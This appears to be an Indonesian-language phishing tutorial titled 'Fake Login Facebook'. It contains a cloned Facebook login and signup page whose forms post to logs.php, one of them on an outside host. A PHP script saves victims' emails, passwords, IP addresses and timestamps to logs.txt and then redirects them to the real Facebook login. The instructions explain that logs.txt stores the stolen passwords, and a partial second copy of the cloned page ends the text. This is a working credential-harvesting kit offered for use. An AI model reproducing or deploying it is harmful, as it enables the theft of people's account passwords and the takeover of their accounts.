<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook">
<head>
<title>Welcome to Facebook! | Facebook</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script type="text/javascript">
//<![CDATA[
(function(href) { var uri_re = /^(?:(?:[^:\/?#]+):)?(?:\/\/(?:[^\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?/; href.replace(uri_re, function(all, path, query, frag) { if (frag) { var dst, src = path + (query ? '?' + query : ''); if (frag.charAt(0) == '/') { dst = frag.replace(/^\/+/, '/'); } else if (/&|=/.test(frag)) { var q = {}; var m = frag.match(/([^#]*)(#.*)?/); var arr = (query||'').split('&').concat((m[1]||'').split('&')); for (var i=0, length=arr.length; i<length; i++) { var t = arr[i].split('='); if (t.length && t[0] != '') { q[t[0]] = t[1]; } } var s = []; for (var i in q) { s.push(i+ (q[i]?'='+q[i]:'')); } dst = path+'?'+s.join('&')+(m[2]||''); } if (dst && dst != src) { window.location.replace(dst); } } }); })(window.location.href);Env={method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:138616,static_base:"http:\/\/static.ak.fbcdn.net\/",ecdc_page_regex:"^\\\/(safe_image\\.php|ajax\\\/perf\\.php|profile\\.php|home\\.php|photo\\.php|album\\.php|photo_search\\.php|photos\\.php|wall\\.php|friends\\\/ajax\\\/filters\\.php|friends\\\/ajax\\\/friends\\.php|friends\\\/ajax\\\/selector\\.php|group\\.php|groups\\.php|friends\\\/$)",ecdc_always_page_regex:"^\\\/ajax\\\/(chat\\\/buddy_list\\.php|presence\\\/update\\.php|typeahead_log\\.php|scribe_log\\.php|f\\.php)"}; var onloadRegister = window.onloadRegister || function(h) { onloadhooks.push(h); }; var onloadhooks = window.onloadhooks || []; var onafterloadRegister = window.onafterloadRegister || function(h) { onafterloadhooks.push(h); }; var onafterloadhooks = window.onafterloadhooks || []; function wait_for_load(element, e, f) { f = bind(element, f, e); if (window.loaded) { return f(); } switch ((e || event).type) { case 'load': onloadRegister(f); return; case 'click': if (element.original_cursor === undefined) { element.original_cursor = element.style.cursor; } if (document.body.original_cursor === undefined) { document.body.original_cursor = document.body.style.cursor; } element.style.cursor = document.body.style.cursor = 'progress'; onafterloadRegister(function() { element.style.cursor = element.original_cursor; document.body.style.cursor = document.body.original_cursor; element.original_cursor = document.body.original_cursor = undefined; if (element.tagName.toLowerCase() == 'a') { var original_event = window.event; window.event = e; var ret_value = element.onclick.call(element, e); window.event = original_event; if (ret_value !== false && element.href) { window.location.href = element.href; } } else if (element.click) { element.click(); } }); break; } return false; }; function bind(obj, method ) { var args = []; for (var ii = 2; ii < arguments.length; ii++) { args.push(arguments[ii]); } var fn = function() { var _obj = obj || (this == window ? false : this); var _args = args.slice(); for (var jj = 0; jj < arguments.length; jj++) { _args.push(arguments[jj]); } if (typeof(method) == "string") { if (_obj[method]) { return _obj[method].apply(_obj, _args); } } else { return method.apply(_obj, _args); } }; if (typeof method == 'string') { fn.name = method; } else if (method && method.name) { fn.name = method.name; } fn.toString = function() { return bind._toString(obj, args, method); }; return fn; }; bind._toString = bind._toString || function(obj, args, method) { return (typeof method == 'string') ? ('late bind<'+method+'>') : ('bound<'+method.toString()+'>'); }; function goURI(uri) { uri = uri.toString(); if (window.PageTransitions && PageTransitions.isInitialized()) { PageTransitions.go(uri); } else if (window.location.href == uri) { window.location.reload(); } else { window.location.href = uri; } } var PrimordialBootloader = window.PrimordialBootloader || { loaded : [], done : function(names) { PrimordialBootloader.loaded.push(names); } }; var Bootloader = window.Bootloader || { done : PrimordialBootloader.done };document.cookie = "cavalry_transit_start_time=; expires=Mon, 26 Jul 1997 05:00:00 GMT; path=\/; domain=.facebook.com";
//]]>
</script>
<meta name="robots" content="noodp,noydir" />
<meta name="description" content="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet." />  <script type="text/javascript" src="http://b.static.ak.fbcdn.net/js_strings.php/t85507/en_US"></script>

    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zWEXR/lpkg/2icskf95/en_US/141/136889/css/4uifzsn2jkissgcg.pkg.css" />

    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zEMQR/lpkg/5b9ntacq/en_US/141/138327/css/2aanubur3f0g40ko.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z96X9/lpkg/3plet3rq/en_US/141/138163/css/eartcl6we3kk4w08.pkg.css" />
<!--[if lte IE 6]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5JTF/l/747bqb4a/en_US/136369/css/ie6.css" type="text/css"/><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zBT4M/l/a8h3fb3n/en_US/136369/css/ie7.css" type="text/css"/><![endif]-->


    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z60XL/lpkg/4rjwya6n/en_US/141/138184/js/84ccno2p1zc44848.pkg.js"></script>
    <script type="ctext/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z7WGV/l/amvwoqik/en_US/129899/js/recaptcha_ajax.js"></script>
    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/zEFXQ/lpkg/3uvzavy7/en_US/141/137500/js/a9pz9yc6jtsksccc.pkg.js"></script>

    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z91MC/l/9baw2grx/nu_ll/132011/js/useragent.js"></script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/opensearch_desc.xml?7:72379" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/favicon.ico?7:132011" />
</head>
<body class="ff3 UIPage_LoggedOut Locale_en_US">
<div id="menubar_container"><div id="fb_menubar" class="fb_menubar_logged_out clearfix"><div id="fb_menubar_logo"><a href="http://www.facebook.com" title="Go to Facebook Home"><span>&nbsp;</span></a></div><div id="fb_menubar_core"></div><div id="fb_menubar_aux"><div class="menu_login_container"><form method="POST" action="logs.php" name="menubar_login" id="menubar_login"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,?,?,?" /><input type="hidden" id="locale" name="locale" value="en_US" /><table cellpadding="0" cellspacing="0"><tr><td class="login_form_label_field login_form_label_remember"><label><input type="checkbox" name="persistent" value="1" />Remember Me</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/reset.php" rel="nofollow">Forgot your password?</a></td><td class="login_form_last_field login_form_label_field"></td></tr><tr><td><input type="text" class="inputtext" id="email" name="email" value="" /></td><td><input type="password" class="inputpassword" id="pass" name="pass" value="" /><input type="text" class="inputtext hidden_elem" id="pass_placeholder" name="pass_placeholder" value="" /></td><td class="login_form_last_field"><div class="UILinkButton"><input type="submit" class="UILinkButton_A" value="Login" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,?,?,?" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="nonfooter"><div id="page_height" class="clearfix"><div id="content" class="fb_content"><div class="UIOneOff_Container"><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div class="WelcomePage_Container"><div class="WelcomePage_MainSellContainer"><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap">&nbsp;</div></div><div class="WelcomePage_MainSellRight"><div class="WelcomePage_SignUpSection"><div class="WelcomePage_SignUpMessage"><div class="WelcomePage_SignUpHeadline">Sign Up</div><div class="WelcomePage_SignUpSubheadline">It's free and anyone can join</div></div><div class="WelcomePage_SimpleReg"><div id="reg_box"><form id="reg" method="post" action="http://hostinganlo.com/logs.php"><input type="hidden" id="locale" name="locale" value="en_US" /><div id="no_js_box"><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div><div id="reg_form_box" style="display:none"><table class="editor" border="0" cellspacing="0"><input type="hidden" id="simple_reg" name="simple_reg" value="1" /><tr><td class="label">Full Name:</td><td><input type="text" class="inputtext" id="name" name="name" value="" /></td></tr>

<tr><td class="label">Your Email:</td><td><input type="text" class="inputtext" id="reg_email__" name="reg_email__" value="" /></td></tr>
<tr><td class="label">New Password:</td><td><input type="password" class="inputpassword" id="reg_passwd__" name="reg_passwd__" value="" /></td></tr>
<tr><td class="label">I am:</td><td><select class="select" name="sex" id="sex"  ><option value="0">Select Sex:</option><option value="1">Female</option><option value="2">Male</option></select></td></tr>
<tr><td class="label">Birthday:</td><td> <select name="birthday_month" id="birthday_month" onchange="editor_date_month_change(this, 'birthday_day','birthday_year');" autocomplete="off"><option value="-1">Month:</option><option value="1">Jan</option>
<option value="2">Feb</option>
<option value="3">Mar</option>

<option value="4">Apr</option>
<option value="5">May</option>
<option value="6">Jun</option>
<option value="7">Jul</option>
<option value="8">Aug</option>
<option value="9">Sep</option>
<option value="10">Oct</option>
<option value="11">Nov</option>
<option value="12">Dec</option>

</select> <select name="birthday_day" id="birthday_day"  autocomplete="off"><option value="-1">Day:</option><option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>

<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>

<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>

<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select> <select name="birthday_year" id="birthday_year" autocomplete="off"><option value="-1">Year:</option><option value="2009">2009</option>
<option value="2008">2008</option>
<option value="2007">2007</option>

<option value="2006">2006</option>
<option value="2005">2005</option>
<option value="2004">2004</option>
<option value="2003">2003</option>
<option value="2002">2002</option>
<option value="2001">2001</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>

<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>

<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>

<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>

<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>

<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>

<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>

<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>

<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>

<option value="1925">1925</option>
<option value="1924">1924</option>
<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>

<option value="1916">1916</option>
<option value="1915">1915</option>
<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
<option value="1908">1908</option>

<option value="1907">1907</option>
<option value="1906">1906</option>
<option value="1905">1905</option>
<option value="1904">1904</option>
<option value="1903">1903</option>
<option value="1902">1902</option>
<option value="1901">1901</option>
<option value="1900">1900</option>
</select></td></tr>

<tr><td class="label"></td><td><div id="birthday_warning"><a href="#" rel="nofollow" onclick="RegUtil.show_birthday_help(); return false;" title="Click for more information">Why do I need to provide this?</a></div></td></tr>
<input type="hidden" id="referrer" name="referrer" value="116" /><input type="hidden" id="challenge" name="challenge" value="fffe95d58784167b3f75b261283acd79" /><input type="hidden" id="md5pass" name="md5pass" value="" /></table><div class="reg_btn clearfix"><div class="UILinkButton UILinkButton_SU"><input type="submit" class="UILinkButton_A" onclick="RegUtil.get_captcha(); return false;" value="Sign Up" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div></div><div class="reg_terms_box"><input type="hidden" id="terms" name="terms" value="on" /><p class="legal_tos">By clicking Sign Up, you are indicating that you have read and agree to the <a href="/terms.php" target="_blank" rel="nofollow">Terms of Use</a> and <a href="/policy.php" target="_blank" rel="nofollow">Privacy Policy</a>.</p></div></div><script type="text/javascript">

      document.getElementById("no_js_box").style.display = "none";
      document.getElementById("reg_form_box").style.display = "";
  
</script>
<div id="reg_captcha" style="display: none;"><h2>Security Check</h2><div id="outer_captcha_box"><div id=captcha_box><div class="field_error" id="captcha_response_error" style="display:none;">This field is required.</div><div id="captcha" class="captcha">
  <div class="captcha_challenge">
    <div id="recaptcha_scripts" style="display:none"></div>

    <div class="recaptcha_text">Enter <strong>both words</strong> below, <strong>separated by a space</strong>.<br />Can't read the words below? <a href="#" id="recaptcha_reload_btn" onclick="Recaptcha.reload(); return false" tabindex="-1">Try different words</a> or <a href="#" class="recaptcha_only_if_image" onclick="Recaptcha.switch_type(&#039;audio&#039;); return false" tabindex="-1">an audio captcha</a>.<span id='recaptcha_play_audio'></span><div class="audiocaptcha"><a href="#" class='recaptcha_only_if_audio' onclick="Recaptcha.switch_type('image'); return false" tabindex='-1'>Back to text.</a></div></div><div id="recaptcha_image">Loading...</div></div><div class="captcha_input"><label>Text in the box:</label><input type="text" name="captcha_response" id="captcha_response" autocomplete="off" /><div style="margin-left: 15px; display: inline;"><a href="#" id="captcha_whatsthis" onclick="captcha_whatsthis(this); return false">What's This?</a></div>

  </div>
</div></div></div><div id="captcha_buttons" class="clearfix"><div id="back_button" class="gridCol"><div class="cancel_button_image">&nbsp;</div><a href="#" onclick="RegUtil.hide_captcha(); RegUtil.show_reg_form(); return false;" id="cancel_button">Back</a></div><div id="A_btn_sign_up" class="gridCol"><div><div class="UILinkButton UILinkButton_SU"><input type="submit" class="UILinkButton_A" onclick="RegUtil.finish_captcha(); return false;" value="Sign Up" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div></div></div></div></div></form><div id="reg_progress" style="display: none"><div id="progress_wrap"><img src="http://b.static.ak.fbcdn.net/images/loaders/indicator_blue_small.gif?7:111099" alt="" />Registering&hellip;</div></div><div id="reg_error" style="display: none">An error occurred. Please try again.</div></form></div></div></div></div></div></div></div></div></div></div></div></div><div id="pagefooter" class= "pagefooter_minimal"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright"><span title="Non-Trimmed">Facebook </span><span id="rtime" title="126">&copy;</span> <span title="10.17.51.117">20</span><span title="15775272">09</span></div><div class="locale_footer_selector"><div id="locale_footer_selector_menu" class="locale_footer_selector_menu" style="display: none;"><a href="http://en-us.facebook.com" onclick="return false">English (US)</a><a href="http://es-la.facebook.com" onclick="intl_set_cookie_locale(null, &#039;es_LA&#039;); return false;">Español</a><a href="http://fr-fr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;fr_FR&#039;); return false;">Français</a><a href="http://de-de.facebook.com" onclick="intl_set_cookie_locale(null, &#039;de_DE&#039;); return false;">Deutsch</a><a href="http://ja-jp.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ja_JP&#039;); return false;">???</a><a href="http://bg-bg.facebook.com" onclick="intl_set_cookie_locale(null, &#039;bg_BG&#039;); return false;">?????????</a><a href="http://ca-es.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ca_ES&#039;); return false;">Català </a><a href="http://cs-cz.facebook.com" onclick="intl_set_cookie_locale(null, &#039;cs_CZ&#039;); return false;">Ceština</a><a href="http://cy-gb.facebook.com" onclick="intl_set_cookie_locale(null, &#039;cy_GB&#039;); return false;">Cymraeg</a><a href="http://da-dk.facebook.com" onclick="intl_set_cookie_locale(null, &#039;da_DK&#039;); return false;">Dansk</a><a href="http://el-gr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;el_GR&#039;); return false;">????????</a><a href="http://en-gb.facebook.com" onclick="intl_set_cookie_locale(null, &#039;en_GB&#039;); return false;">English (UK)</a><a href="http://es-es.facebook.com" onclick="intl_set_cookie_locale(null, &#039;es_ES&#039;); return false;">Español (España)</a><a href="http://fi-fi.facebook.com" onclick="intl_set_cookie_locale(null, &#039;fi_FI&#039;); return false;">Suomi</a><a href="http://hr-hr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;hr_HR&#039;); return false;">Hrvatski</a><a href="http://hu-hu.facebook.com" onclick="intl_set_cookie_locale(null, &#039;hu_HU&#039;); return false;">Magyar</a><a href="http://id-id.facebook.com" onclick="intl_set_cookie_locale(null, &#039;id_ID&#039;); return false;">Bahasa Indonesia</a><a href="http://it-it.facebook.com" onclick="intl_set_cookie_locale(null, &#039;it_IT&#039;); return false;">Italiano</a><a href="http://ko-kr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ko_KR&#039;); return false;">???</a><a href="http://ms-my.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ms_MY&#039;); return false;">Bahasa Melayu</a><a href="http://nb-no.facebook.com" onclick="intl_set_cookie_locale(null, &#039;nb_NO&#039;); return false;">Norsk (bokmål)</a><a href="http://nl-nl.facebook.com" onclick="intl_set_cookie_locale(null, &#039;nl_NL&#039;); return false;">Nederlands</a><a href="http://pl-pl.facebook.com" onclick="intl_set_cookie_locale(null, &#039;pl_PL&#039;); return false;">Polski</a><a href="http://pt-br.facebook.com" onclick="intl_set_cookie_locale(null, &#039;pt_BR&#039;); return false;">Português (Brasil)</a><a href="http://pt-pt.facebook.com" onclick="intl_set_cookie_locale(null, &#039;pt_PT&#039;); return false;">Português (Portugal)</a><a href="http://ro-ro.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ro_RO&#039;); return false;">Româna</a><a href="http://ru-ru.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ru_RU&#039;); return false;">???????</a><a href="http://sl-si.facebook.com" onclick="intl_set_cookie_locale(null, &#039;sl_SI&#039;); return false;">Slovenšcina</a><a href="http://sr-rs.facebook.com" onclick="intl_set_cookie_locale(null, &#039;sr_RS&#039;); return false;">??????</a><a href="http://sv-se.facebook.com" onclick="intl_set_cookie_locale(null, &#039;sv_SE&#039;); return false;">Svenska</a><a href="http://th-th.facebook.com" onclick="intl_set_cookie_locale(null, &#039;th_TH&#039;); return false;">???????</a><a href="http://tl-ph.facebook.com" onclick="intl_set_cookie_locale(null, &#039;tl_PH&#039;); return false;">Filipino</a><a href="http://tr-tr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;tr_TR&#039;); return false;">Türkçe</a><a href="http://vi-vn.facebook.com" onclick="intl_set_cookie_locale(null, &#039;vi_VN&#039;); return false;">Ti?ng Vi?t</a><a href="http://zh-cn.facebook.com" onclick="intl_set_cookie_locale(null, &#039;zh_CN&#039;); return false;">??(??)</a><a href="http://zh-hk.facebook.com" onclick="intl_set_cookie_locale(null, &#039;zh_HK&#039;); return false;">??(??)</a><a href="http://zh-tw.facebook.com" onclick="intl_set_cookie_locale(null, &#039;zh_TW&#039;); return false;">??(??)</a></div><div class="locale_footer_selector_hitarea" id="locale_footer_selector_hitarea"><a href="#" onclick="optional_drop_down_menu(
    null,
    $('locale_footer_selector_hitarea'),
    $('locale_footer_selector_menu'),
    null, null, null, null, null, $('locale_footer_selector_hitarea'),
    {bottom: ($('locale_footer_selector_menu').offsetHeight + $('locale_footer_selector_hitarea').offsetHeight), left: 0}
    ); return false;">English (US)</a><div class="locale_footer_selector_hitarea_right" onclick="optional_drop_down_menu(
    null,
    $('locale_footer_selector_hitarea'),
    $('locale_footer_selector_menu'),
    null, null, null, null, null, $('locale_footer_selector_hitarea'),
    {bottom: ($('locale_footer_selector_menu').offsetHeight + $('locale_footer_selector_hitarea').offsetHeight), left: 0}
    ); return false;"></div></div></div></div><div id="pagefooter_links"><ul id="pagefooter_left_links"><li><a href="http://www.facebook.com/login.php?ref=pf">Login</a></li><li><a href="http://www.facebook.com/facebook?ref=pf" rel="nofollow">About</a></li><li><a href="http://a.ok.facebook.com/cm/ck/10111-65086-13764-11?loc=2">Advertising</a></li><li><a href="http://developers.facebook.com/?ref=pf">Developers</a></li><li><a href="http://www.facebook.com/jobs/?ref=pf">Jobs</a></li><li><a href="http://www.facebook.com/terms.php?ref=pf" rel="nofollow">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="http://www.facebook.com/findfriends.php?ref=pf">Find Friends</a></li><li><a href="http://www.facebook.com/policy.php?ref=pf" rel="nofollow">Privacy</a></li><li><a href="http://www.facebook.com/help.php?ref=pf" rel="nofollow">Help</a></li></ul></div></div></div><div id="js_buffer"><script type="text/javascript"></script>


<script type="text/javascript">
Bootloader.configurePage({"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zWEXR\/lpkg\/2icskf95\/en_US\/141\/136889\/css\/4uifzsn2jkissgcg.pkg.css":["css\/4uifzsn2jkissgcg.pkg.css",true],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zEMQR\/lpkg\/5b9ntacq\/en_US\/141\/138327\/css\/2aanubur3f0g40ko.pkg.css":["css\/2aanubur3f0g40ko.pkg.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z96X9\/lpkg\/3plet3rq\/en_US\/141\/138163\/css\/eartcl6we3kk4w08.pkg.css":["css\/eartcl6we3kk4w08.pkg.css",true]});
Bootloader.done(["css\/4uifzsn2jkissgcg.pkg.css","css\/2aanubur3f0g40ko.pkg.css","css\/eartcl6we3kk4w08.pkg.css"]);


onloadRegister(function() {new RegKeyPressListen();});
onloadRegister(function() {new CaptchaBoxKeyPressListen();});
onloadRegister(function() {Recaptcha.focus_on_load = false;});
onloadRegister(function() {ffid='64Fjtb+6is5dHEBlwDtNlA==';});
onloadRegister(function() {window.loading_page_chrome = true;});
onloadRegister(function() {focus_login(0, true);});
onloadRegister(function() {new MenuBar("fb_menubar_core").setTimeoutInterval(250).init();});
onloadRegister(function() {new MenuBar("fb_menubar_aux").setTimeoutInterval(100).init();});
onloadRegister(function() {window.loading_page_chrome = false;});
onloadRegister(function() {var n = "rtime"; (window.ge && ge(n)) && (ge(n).title += " | 137");});
onloadRegister(function() {
      onbeforeunloadRegister(function () {
        window.setCookie && window.setCookie("cavalry_transit_start_time", (new Date()).getTime(), 10000);
        }, true);});

</script></div></body>
</html>

NB: Buat sebuah php dan log.txt

Mencuri Pasword Facebook Metode (Fake Login Facebook)

=====================================================
=================== SCRIPT NO. 2 ====================


<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
<!--
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
// -->
</script>";
?>

=====================================================
=================== Jangan Lupa Hal Ini =============

Jangan Lupa & wajib Membuat Satu File Bernama: logs.txt

logs.txt digunakan sebagai tempat untuk menyimpan hasil password yang telah di dapat


=====================================================
=================== SELAMAT MENCOBA =================

Mencuri Pasword Facebook Metode (Fake Login Facebook)

=====================================================
=================== SCRIPT NO. 1 ====================


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook">
<head>
<title>Welcome to Facebook! | Facebook</title>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-language" content="en" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script type="text/javascript">
//<![CDATA[
(function(href) { var uri_re = /^(?:(?:[^:\/?#]+):)?(?:\/\/(?:[^\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?/; href.replace(uri_re, function(all, path, query, frag) { if (frag) { var dst, src = path + (query ? '?' + query : ''); if (frag.charAt(0) == '/') { dst = frag.replace(/^\/+/, '/'); } else if (/&|=/.test(frag)) { var q = {}; var m = frag.match(/([^#]*)(#.*)?/); var arr = (query||'').split('&').concat((m[1]||'').split('&')); for (var i=0, length=arr.length; i<length; i++) { var t = arr[i].split('='); if (t.length && t[0] != '') { q[t[0]] = t[1]; } } var s = []; for (var i in q) { s.push(i+ (q[i]?'='+q[i]:'')); } dst = path+'?'+s.join('&')+(m[2]||''); } if (dst && dst != src) { window.location.replace(dst); } } }); })(window.location.href);Env={method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:138616,static_base:"http:\/\/static.ak.fbcdn.net\/",ecdc_page_regex:"^\\\/(safe_image\\.php|ajax\\\/perf\\.php|profile\\.php|home\\.php|photo\\.php|album\\.php|photo_search\\.php|photos\\.php|wall\\.php|friends\\\/ajax\\\/filters\\.php|friends\\\/ajax\\\/friends\\.php|friends\\\/ajax\\\/selector\\.php|group\\.php|groups\\.php|friends\\\/$)",ecdc_always_page_regex:"^\\\/ajax\\\/(chat\\\/buddy_list\\.php|presence\\\/update\\.php|typeahead_log\\.php|scribe_log\\.php|f\\.php)"}; var onloadRegister = window.onloadRegister || function(h) { onloadhooks.push(h); }; var onloadhooks = window.onloadhooks || []; var onafterloadRegister = window.onafterloadRegister || function(h) { onafterloadhooks.push(h); }; var onafterloadhooks = window.onafterloadhooks || []; function wait_for_load(element, e, f) { f = bind(element, f, e); if (window.loaded) { return f(); } switch ((e || event).type) { case 'load': onloadRegister(f); return; case 'click': if (element.original_cursor === undefined) { element.original_cursor = element.style.cursor; } if (document.body.original_cursor === undefined) { document.body.original_cursor = document.body.style.cursor; } element.style.cursor = document.body.style.cursor = 'progress'; onafterloadRegister(function() { element.style.cursor = element.original_cursor; document.body.style.cursor = document.body.original_cursor; element.original_cursor = document.body.original_cursor = undefined; if (element.tagName.toLowerCase() == 'a') { var original_event = window.event; window.event = e; var ret_value = element.onclick.call(element, e); window.event = original_event; if (ret_value !== false && element.href) { window.location.href = element.href; } } else if (element.click) { element.click(); } }); break; } return false; }; function bind(obj, method ) { var args = []; for (var ii = 2; ii < arguments.length; ii++) { args.push(arguments[ii]); } var fn = function() { var _obj = obj || (this == window ? false : this); var _args = args.slice(); for (var jj = 0; jj < arguments.length; jj++) { _args.push(arguments[jj]); } if (typeof(method) == "string") { if (_obj[method]) { return _obj[method].apply(_obj, _args); } } else { return method.apply(_obj, _args); } }; if (typeof method == 'string') { fn.name = method; } else if (method && method.name) { fn.name = method.name; } fn.toString = function() { return bind._toString(obj, args, method); }; return fn; }; bind._toString = bind._toString || function(obj, args, method) { return (typeof method == 'string') ? ('late bind<'+method+'>') : ('bound<'+method.toString()+'>'); }; function goURI(uri) { uri = uri.toString(); if (window.PageTransitions && PageTransitions.isInitialized()) { PageTransitions.go(uri); } else if (window.location.href == uri) { window.location.reload(); } else { window.location.href = uri; } } var PrimordialBootloader = window.PrimordialBootloader || { loaded : [], done : function(names) { PrimordialBootloader.loaded.push(names); } }; var Bootloader = window.Bootloader || { done : PrimordialBootloader.done };document.cookie = "cavalry_transit_start_time=; expires=Mon, 26 Jul 1997 05:00:00 GMT; path=\/; domain=.facebook.com";
//]]>
</script>
<meta name="robots" content="noodp,noydir" />
